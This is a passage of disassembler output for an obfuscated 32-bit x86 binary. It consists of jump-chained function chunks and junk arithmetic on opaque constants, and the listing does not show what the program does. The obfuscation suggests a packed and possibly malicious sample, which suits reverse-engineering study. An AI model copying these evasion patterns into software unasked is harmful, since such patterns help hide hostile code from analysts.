		or	eax, 0BDB8622Fh
		rol	eax, 1Eh
		xor	eax, 0FF7ED9EFh
		call	sub_458681
		push	edi
		jmp	loc_45BDA8
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_4580F2	proc near		; CODE XREF: y2kk37jd:004423D3j
					; y2kk37jd:0044A437p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BD5F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B68C SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	esi, [esp-4+arg_0]
		mov	ebx, esi
		pop	esi
		jmp	loc_43BD5F
sub_4580F2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_458101	proc near		; CODE XREF: y2kk37jd:0044458Ej
					; sub_455531+5p

; FUNCTION CHUNK AT 0043E6B8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004437E3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	1B435484h
		pop	edx
		rol	edx, 8
		xor	edx, 34D2C031h
		jmp	loc_4437E3
sub_458101	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_458119:				; CODE XREF: y2kk37jd:loc_44ED21j
		push	5810FE48h
		pop	ebx
		xor	ebx, 4FBAEE70h
		jnz	loc_43CE94

loc_45812B:				; CODE XREF: y2kk37jd:00446988j
		jmp	sub_453E7A
; ---------------------------------------------------------------------------
		mov	ebp, edx
		jmp	loc_44722D
; ---------------------------------------------------------------------------
		jnz	loc_4520B3
		jmp	sub_43CB02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_458142:				; CODE XREF: sub_43F346+5869j
					; y2kk37jd:loc_44780Fj
		mov	edx, ebx
		pop	ebx
		or	edx, 1F3A8517h

loc_45814B:				; CODE XREF: y2kk37jd:00459C96j
		add	edx, 7504B50Eh
		push	offset loc_459B3F
; END OF FUNCTION CHUNK	FOR sub_43F346
; START	OF FUNCTION CHUNK FOR sub_445226

loc_458156:				; CODE XREF: sub_445226:loc_457CDAj
		jmp	nullsub_287
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45815B:				; CODE XREF: y2kk37jd:loc_455A2Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B0A5

loc_45815C:				; CODE XREF: sub_45B0A5+Bj
		jmp	loc_44D779
; END OF FUNCTION CHUNK	FOR sub_45B0A5

; =============== S U B	R O U T	I N E =======================================



sub_458161	proc near		; DATA XREF: sub_440EC8+7055o
					; sub_45609B+7o
		call	sub_448718
sub_458161	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45136B

loc_458166:				; CODE XREF: sub_45136B+188Cj
		jmp	loc_445E71
; END OF FUNCTION CHUNK	FOR sub_45136B

; =============== S U B	R O U T	I N E =======================================



sub_45816B	proc near		; DATA XREF: sub_445226+16403o
		push	edx
		push	0CF3B757Ch
		pop	edx
		sub	edx, ds:4000EFh
		add	edx, 3244E750h
		add	eax, edx
		pop	edx
		mov	edx, [esp+0]
		jmp	loc_453C25
sub_45816B	endp

; ---------------------------------------------------------------------------
		rol	ebx, 0Ch
		and	edi, 90ADD324h
		jmp	sub_452EA0
; ---------------------------------------------------------------------------

loc_458197:				; CODE XREF: y2kk37jd:0044ECF1j
		inc	dword ptr [ebp-1Ch]
		jmp	loc_44F554
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_45819F:				; CODE XREF: sub_446861+1026Cj
					; sub_446861+10C37j
		inc	dword ptr [ebp-18h]
		dec	dword ptr [ebp-24h]
		jnz	loc_44E419
		jmp	loc_44F32A
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_4581B0:				; CODE XREF: sub_4424B0+C728j
		rol	eax, 0Bh
		push	eax
		jmp	loc_45AAE5
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------

loc_4581B9:				; DATA XREF: sub_44438E:loc_4561EAo
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4581BB	proc near		; CODE XREF: sub_43B949+4p
					; sub_43C2D9+9p ...

; FUNCTION CHUNK AT 0044DA3A SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	offset sub_45705C
		jmp	loc_44DA3A
sub_4581BB	endp

; ---------------------------------------------------------------------------
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		ror	eax, 13h
		mov	ds:dword_44D2D8, eax
		jmp	loc_45A010
; ---------------------------------------------------------------------------

loc_4581DC:				; CODE XREF: y2kk37jd:loc_455A4Ej
		cmp	ecx, esi
		jmp	loc_44A64F

; =============== S U B	R O U T	I N E =======================================



sub_4581E3	proc near		; CODE XREF: sub_454BF6j
					; DATA XREF: sub_443BAF+1103Do
		xchg	edx, [esp+0]
		jmp	sub_440CD1
sub_4581E3	endp

; ---------------------------------------------------------------------------

loc_4581EB:				; CODE XREF: y2kk37jd:loc_43F6F8j
		add	ebx, 0EA2C9A06h
		and	ecx, ebx
		pop	ebx
		push	offset loc_454D23
		jmp	loc_45B4EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_4581FE:				; CODE XREF: sub_4468E0:loc_45C1BAj
		call	sub_458681
		push	edx
		call	sub_44EC21
; END OF FUNCTION CHUNK	FOR sub_4468E0
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_458209:				; CODE XREF: sub_44AAA1-B53Fj
		jmp	loc_43F590
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_458F84
; ---------------------------------------------------------------------------

loc_458214:				; DATA XREF: sub_44C2CD+3o
		push	71BDFD3Ah
		pop	edx
		or	edx, 0A62B7BEEh
		xor	edx, 0B185E544h
		call	sub_4572E5

loc_45822B:				; CODE XREF: y2kk37jd:00445606j
		jmp	locret_456256
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_458230:				; CODE XREF: sub_43BD3D+2274j
		jmp	loc_454B08
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; ---------------------------------------------------------------------------

loc_458235:				; CODE XREF: y2kk37jd:loc_440CF1j
					; y2kk37jd:00453AA2j
		push	offset sub_440EC2
		jmp	locret_441FDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_45823F:				; CODE XREF: sub_454E20+Ej
		jnz	loc_4535DC
		jmp	loc_4448D3
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441856

loc_45824A:				; CODE XREF: sub_441856:loc_43C3D0j
		jp	loc_455113
		jmp	loc_4517A3
; END OF FUNCTION CHUNK	FOR sub_441856
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_458255:				; CODE XREF: sub_445226+14A3Dj
		push	0A0185669h
		ror	edi, 14h
		jmp	loc_4438E2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_458262:				; CODE XREF: y2kk37jd:loc_458D57j
		jz	loc_459F6E
		jmp	loc_444E3C
; ---------------------------------------------------------------------------

locret_45826D:				; CODE XREF: y2kk37jd:0044A254j
		retn
; ---------------------------------------------------------------------------

loc_45826E:				; CODE XREF: y2kk37jd:0044A60Aj
		jmp	loc_44FAFF

; =============== S U B	R O U T	I N E =======================================



sub_458273	proc near		; CODE XREF: y2kk37jd:0044A6E4j
					; sub_44E9BA+325Dp

; FUNCTION CHUNK AT 00453F1D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00456336 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E03 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	edx, [edx]

loc_458279:				; CODE XREF: y2kk37jd:00440019j
		mov	[edx], eax

loc_45827B:				; CODE XREF: sub_4447EA:loc_454068j
					; sub_457DD3:loc_457740j
		push	eax
		push	3AB589B6h
		pop	eax
		jmp	loc_456336
sub_458273	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_458287:				; CODE XREF: sub_43C865:loc_452845j
		cmp	al, 0A4h
		jz	loc_448D38
		jmp	loc_43F094
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_458294:				; CODE XREF: sub_45ADEC-10BB9j
		and	edx, 987144B0h
		add	edx, 4B57EAA0h
		add	edx, ebp
		add	edx, 3498155Ch
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_4522A0
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------

loc_4582B1:				; CODE XREF: y2kk37jd:0043BDCFj
		and	ebx, 7C3786BAh
		jns	loc_43E5FF
		add	eax, 0FC9BCE58h
		jmp	loc_43E5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4582C8:				; CODE XREF: sub_43C851+818Fj
		jns	loc_43D67F
		xchg	ecx, edi
		jmp	loc_44092A
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_4582D5:				; CODE XREF: sub_442F52-34F3j
		sub	eax, 0F0E6DC78h

loc_4582DB:				; CODE XREF: sub_442F52:loc_43FA54j
		xor	eax, 35FACC8Ch
		sub	eax, 0E77DF205h
		and	eax, 22FD395Eh
		xor	eax, 2FE9B802h
		call	sub_440337
		push	edi
		jmp	loc_44906E
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------

loc_4582FE:				; CODE XREF: y2kk37jd:00450097j
		not	eax
		xchg	ebx, [ebp+0]

loc_458303:				; CODE XREF: y2kk37jd:loc_4427A1j
					; y2kk37jd:loc_4474EDj
		push	offset sub_44C8B5
		jmp	loc_454C69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA4A

loc_45830D:				; CODE XREF: sub_44AA4A:loc_446F4Bj
		jz	loc_456C17
		jmp	loc_44D048
; END OF FUNCTION CHUNK	FOR sub_44AA4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_458318:				; CODE XREF: sub_43E07B:loc_44CCA0j
		xor	eax, 0BCC6CC6Ch
		add	eax, 80E815B4h
		add	eax, ebp
		add	eax, 0E248F4DBh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44461A
		jmp	loc_44405C
; END OF FUNCTION CHUNK	FOR sub_43E07B

; =============== S U B	R O U T	I N E =======================================



sub_45833C	proc near		; CODE XREF: y2kk37jd:0044705Dj
					; sub_445226:loc_452D1Dp

; FUNCTION CHUNK AT 0043DF6C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EABB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447FF3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D2D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC38 SIZE 00000003 BYTES

		xchg	edi, [esp+0]

loc_45833F:				; CODE XREF: y2kk37jd:loc_44C6B0j
		pop	edi
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44FC40
		jmp	loc_44D2D2
sub_45833C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_458351:				; CODE XREF: y2kk37jd:0044BB4Dj
		and	edi, 0B5503475h
		or	edi, 95465E95h
		add	edi, 6AA9C11Bh
		push	offset sub_456949
		jmp	locret_4432B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45836D:				; CODE XREF: sub_445226-3709j
		jno	loc_44E76D

loc_458373:				; CODE XREF: sub_445226:loc_44F728j
		lea	eax, [ebp-24h]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		push	40h
		jmp	loc_4591CC
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_458383:				; CODE XREF: y2kk37jd:loc_4562A2j
		shr	ebp, 0Ah
		push	1EFCA8Dh
		jo	loc_44929F
		rol	ebx, 1Ch
		test	edi, 6A76E4D4h
		jmp	loc_43C9D1
; ---------------------------------------------------------------------------

loc_45839F:				; DATA XREF: sub_4507BF:loc_441A41o
		mov	dword ptr [ebp-4], 1
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		retn	8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D41B

loc_4583AF:				; CODE XREF: sub_44D41B+Fj
		jmp	sub_4543EF
; END OF FUNCTION CHUNK	FOR sub_44D41B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4583B4:				; CODE XREF: sub_4507BF-AD13j
					; sub_4507BF+16j
		jz	loc_44D8AA
		cmp	dword ptr [ebp-10Ch], 6D676552h
		jmp	loc_442745
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EA11

loc_4583C9:				; CODE XREF: sub_43EA11+25j
		xchg	esi, [esp+4+var_4]
		jmp	loc_43B17D
; END OF FUNCTION CHUNK	FOR sub_43EA11
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_4583D1:				; CODE XREF: sub_44B0D0:loc_43FAB7j
					; y2kk37jd:0043FAD5j ...
		add	edx, 0EBAB6963h
		add	edx, ebp
		add	edx, 71C9853Fh
		mov	edx, [edx]
		jmp	loc_43CC2E
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4583E6:				; CODE XREF: sub_445226-3B3Dj
					; sub_4580C5:loc_459423j
		call	sub_45405E
		push	0CA8CBFFDh
		pop	edx
		or	edx, 7E547090h
		cmp	edx, 736D6F29h
		jmp	loc_45B8CB
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_458402:				; CODE XREF: y2kk37jd:004493A7j
		jge	loc_455B1E
		cdq
		sub	ebx, edi
		jns	loc_44D2D2
		jmp	loc_44DA5A
; ---------------------------------------------------------------------------
		push	16D943ECh
		jmp	sub_450CD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_458420:				; CODE XREF: sub_453B0B:loc_44D0D2j
		jl	loc_43C1E6
; END OF FUNCTION CHUNK	FOR sub_453B0B
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_458426:				; CODE XREF: sub_4440AB:loc_43D083j
					; sub_44DB32+E29Bj
		jmp	nullsub_301
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45842B:				; CODE XREF: sub_445226+F825j
		jmp	loc_453421
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_458430:				; CODE XREF: y2kk37jd:0043FD11j
		jmp	loc_43B6CE
; ---------------------------------------------------------------------------
		rol	ecx, 0Bh
		push	edi
		jmp	loc_43C1E4
; ---------------------------------------------------------------------------

loc_45843E:				; DATA XREF: sub_455C79:loc_44636Bo
		mov	[ebp-4], eax
; START	OF FUNCTION CHUNK FOR sub_445568

loc_458441:				; CODE XREF: sub_4571A7:loc_440DF8j
					; sub_445226+B1A1j ...
		jnz	loc_452373
		cmp	dword ptr [ebp-4], 0
		jnz	loc_443F3F
		jmp	loc_44C003
; ---------------------------------------------------------------------------

loc_458456:				; CODE XREF: sub_445568:loc_44649Dj
		adc	edi, ecx
		jmp	sub_45354C
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452568

loc_45845D:				; CODE XREF: sub_452568+Cj
					; sub_45A45E-7B34j
		push	eax
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0Ch+var_C]
; END OF FUNCTION CHUNK	FOR sub_452568
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_458464:				; CODE XREF: sub_4487FD:loc_45150Bj
		mov	edx, eax
		jmp	loc_456C4C
; END OF FUNCTION CHUNK	FOR sub_4487FD
; ---------------------------------------------------------------------------

locret_45846B:				; CODE XREF: y2kk37jd:loc_452B6Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45846C:				; CODE XREF: sub_445226+6F35j
		jmp	loc_455627
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_458471:				; CODE XREF: sub_44BD20+Ej
		jmp	loc_43E18A
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A7D

loc_458476:				; CODE XREF: sub_459A7D:loc_453DF7j
		mov	eax, [ebp+var_4]

loc_458479:				; CODE XREF: y2kk37jd:0043D45Aj
		call	sub_45A783

loc_45847E:				; CODE XREF: y2kk37jd:0045C52Ej
		push	4CB54BC6h
		pop	edx
		add	edx, 0AA4912F2h
		cmp	edx, 0CF2C8165h
		jmp	loc_43ED71
; END OF FUNCTION CHUNK	FOR sub_459A7D
; ---------------------------------------------------------------------------

loc_458495:				; CODE XREF: y2kk37jd:00443605j
		jz	loc_457727
		jnb	loc_4536EB
		mov	[ecx], edx
		jmp	loc_457727
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F61

loc_4584A8:				; CODE XREF: sub_444F61:loc_45023Cj
		mov	eax, [eax]
		push	offset sub_44921F
		jmp	loc_443064
; END OF FUNCTION CHUNK	FOR sub_444F61
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4584B5:				; CODE XREF: y2kk37jd:loc_43CA1Dj
		jz	loc_444928
		jmp	loc_457108
; ---------------------------------------------------------------------------

loc_4584C0:				; CODE XREF: y2kk37jd:00458770j
		pushf
		sbb	edi, 457D1615h
		adc	edi, ebx
		jmp	loc_44BA99
; ---------------------------------------------------------------------------
		xchg	ecx, edx
		jmp	sub_452224
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457986

loc_4584D5:				; CODE XREF: sub_457986:loc_43EB0Dj
		pop	edi
		xor	edi, 9D90623h
		rol	edi, 1Ch
		sub	edi, 0A0A6AD37h
		or	edi, 89F7930Fh
		add	edi, 6445F95h
		xchg	edi, [esp+0Ch+var_C]
		jmp	sub_44DAE1
; END OF FUNCTION CHUNK	FOR sub_457986
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4584F9:				; CODE XREF: sub_454539-FE75j
					; sub_454539:loc_44BFF0j
		xor	eax, 0DAA17FABh
		and	eax, 59DED328h
		add	eax, 0B9491F9Dh
		push	offset loc_455F2C
		jmp	loc_44D9A2
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_458515:				; CODE XREF: sub_4562E5-68C3j
		jnz	sub_4497B0
		jmp	loc_43FC28
; END OF FUNCTION CHUNK	FOR sub_4562E5

; =============== S U B	R O U T	I N E =======================================



sub_458520	proc near		; DATA XREF: sub_43BF5F+9206o

; FUNCTION CHUNK AT 0043B3FB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004455E0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B1C3 SIZE 0000000A BYTES

		add	eax, 15921E33h
		add	eax, ebp
		call	sub_456FC0

loc_45852D:				; CODE XREF: sub_443DB8+18621j
		jmp	loc_4455E0
sub_458520	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_458532:				; CODE XREF: sub_43E679+5D4Fj
		jl	loc_45654C
		sub	edi, 256AC8C2h
		jmp	sub_450891
; END OF FUNCTION CHUNK	FOR sub_43E679
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jmp	ds:off_41E204
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451854

loc_45854A:				; CODE XREF: sub_451854+AC41j
		jmp	loc_457BC0
; END OF FUNCTION CHUNK	FOR sub_451854
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_45854F:				; CODE XREF: sub_43B163+7j
					; sub_4508FD-91F1j ...
		xchg	edi, [esp-4+arg_0]
		mov	edx, edi
		pop	edi
		jnb	loc_43B16F
		mov	eax, [esp-8+arg_4]
		jmp	loc_43E9D3
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_458563:				; CODE XREF: sub_440337:loc_43D5E6j
					; y2kk37jd:0043D5F9j
		add	eax, 0F9467878h
		call	sub_44036F
; END OF FUNCTION CHUNK	FOR sub_440337
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45856E:				; CODE XREF: sub_4411C3+18j
		jb	loc_458E1C

loc_458574:				; CODE XREF: sub_43F911+13F22j
		jmp	loc_44BB77
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		sbb	eax, 0A1688A72h
		not	eax
		jmp	loc_458E16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_458586:				; CODE XREF: sub_44023C+DCD1j
		mov	esi, ecx
		pop	ecx
		push	eax
		mov	edx, 0FFFFFFFFh
		push	edx
		push	eax
		push	edx
		jmp	loc_44D7AE
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
		pushf
		test	eax, 54734DE1h
		jmp	loc_43C5AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4585A3:				; CODE XREF: sub_43ED19+CCF8j
		sbb	ebp, esi
		push	0B1C16A89h

loc_4585AA:				; CODE XREF: sub_43ED19:loc_4427CAj
		push	offset loc_456D9A
		jmp	loc_43F5B8
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_4585B4	proc near		; DATA XREF: sub_459035-1DABDo
		jz	loc_459FF4
		call	nullsub_11
		jmp	loc_456488
sub_4585B4	endp


; =============== S U B	R O U T	I N E =======================================



sub_4585C4	proc near		; CODE XREF: sub_459035+3j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044736A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AABA SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00458D90 SIZE 0000000F BYTES

		add	esp, 0FFFFFED8h
		call	sub_44704D

loc_4585CF:				; CODE XREF: sub_445226+11138j
		jmp	loc_458D90
sub_4585C4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FAB

loc_4585D4:				; CODE XREF: sub_453FAB+Aj
		jmp	nullsub_507
; END OF FUNCTION CHUNK	FOR sub_453FAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45454E

loc_4585D9:				; CODE XREF: sub_45454E-8A6Ej
		jmp	loc_44543A
; END OF FUNCTION CHUNK	FOR sub_45454E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_4585DE:				; CODE XREF: sub_43BA66+203D1j
		call	sub_44C5E9
		mov	edx, 0E5254649h
		call	sub_455DD8
		mov	ds:dword_4470C4, eax
; END OF FUNCTION CHUNK	FOR sub_43BA66
; START	OF FUNCTION CHUNK FOR sub_45BE0D

loc_4585F2:				; CODE XREF: sub_443674+4j
					; y2kk37jd:loc_446258j	...
		mov	esp, ebp
		pop	ebp
		push	ds:dword_4470C4
		jmp	loc_45152B
; END OF FUNCTION CHUNK	FOR sub_45BE0D
; ---------------------------------------------------------------------------
		rol	ebp, 4
		jmp	sub_45A40E
; ---------------------------------------------------------------------------

loc_458608:				; DATA XREF: y2kk37jd:0044BFE6o
		mov	eax, [esp]
		push	ebx
		call	sub_458CE4
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_458611:				; CODE XREF: sub_45B41E+7j
		jmp	loc_45AB11
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF42

loc_458616:				; CODE XREF: sub_43CF42+9j
		mov	eax, [ebp-0Ch]
		push	offset loc_44C389
		jmp	nullsub_512
; END OF FUNCTION CHUNK	FOR sub_43CF42
; ---------------------------------------------------------------------------

loc_458623:				; DATA XREF: sub_44D0DCo
		push	eax
		call	sub_454DDC
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		push	eax
		push	edi
		push	0F5DECCC5h
		jmp	loc_443CDA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_227. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_45863C:				; CODE XREF: sub_44AC89:loc_43DC37j
		ror	edi, 1Eh
		test	eax, 0A9995A2Ah
		jmp	loc_44689C
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		jmp	ds:off_41E024
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_458650:				; CODE XREF: sub_448700-4B7Fj
		jmp	loc_4540A6
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454433

loc_458655:				; CODE XREF: sub_456990-141A0j
					; y2kk37jd:0044CC69j ...
		pop	edx
		js	loc_44CC6E
		mov	eax, [esp+8+var_8]
		jmp	loc_44A64A
; END OF FUNCTION CHUNK	FOR sub_454433
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B405

loc_458664:				; CODE XREF: sub_44B405:loc_456257j
		jmp	ds:off_41E098
; END OF FUNCTION CHUNK	FOR sub_44B405

; =============== S U B	R O U T	I N E =======================================



sub_45866A	proc near		; CODE XREF: sub_44B405p
					; sub_44C5E9+7C3Fj ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004405B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044259A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004462C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045213E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045422D SIZE 0000000A BYTES

		pop	edx
		js	loc_45422D
		mov	eax, [esp+0]
		push	edx
		push	esi
		push	0DAC5B625h
		jmp	loc_45213E
sub_45866A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn

; =============== S U B	R O U T	I N E =======================================



sub_458681	proc near		; CODE XREF: sub_4441FF+4p
					; y2kk37jd:0044A2F1p ...

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 00454AF1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458DFD SIZE 00000006 BYTES

		push	eax
		push	0
		push	eax
		push	0CD07EAA4h
		pop	eax
		sub	eax, 0CFC479A1h
		test	eax, 10000h

loc_458697:				; CODE XREF: y2kk37jd:loc_448051j
		jmp	loc_458DFD
sub_458681	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44472C

loc_45869C:				; CODE XREF: sub_44472C-50E1j
		add	esp, 8
		movzx	eax, word ptr [eax]
		shl	eax, 2
		mov	edx, [ebp-14h]
		jmp	loc_4566B5
; END OF FUNCTION CHUNK	FOR sub_44472C

; =============== S U B	R O U T	I N E =======================================



sub_4586AD	proc near		; DATA XREF: y2kk37jd:0045334Ao
		push	7EB4441h
		pop	eax
		sub	eax, 0A8BFFB8Dh
		add	eax, 31ACF4Eh
		xor	eax, 334CF271h
		push	edx
		push	0F1558400h
		pop	edx
sub_4586AD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44C304

loc_4586CC:				; CODE XREF: sub_44C304+4230j
		jmp	loc_4486C2
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44572F

loc_4586D1:				; CODE XREF: sub_44572F:loc_43D361j
		xchg	esi, [esp+34h+var_34]
		jmp	sub_4436E7
; END OF FUNCTION CHUNK	FOR sub_44572F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_4586D9:				; CODE XREF: sub_455556:loc_44BA43j
		jbe	loc_44DAD6
		jmp	loc_4410B5
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_4586E4:				; CODE XREF: sub_454C24-16DFAj
		shr	eax, 6
		jg	loc_45A12C
		sbb	ecx, 3FFB1F6Eh
		jmp	loc_43CEBB
; END OF FUNCTION CHUNK	FOR sub_454C24

; =============== S U B	R O U T	I N E =======================================



sub_4586F8	proc near		; CODE XREF: sub_44B613:loc_45083Aj

var_4		= dword	ptr -4

		push	ebx
		push	0AC2C9556h
		pop	ebx
		and	ebx, 6CB76DC8h
		add	ebx, 0D420BAA6h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_45ADEC
sub_4586F8	endp


; =============== S U B	R O U T	I N E =======================================



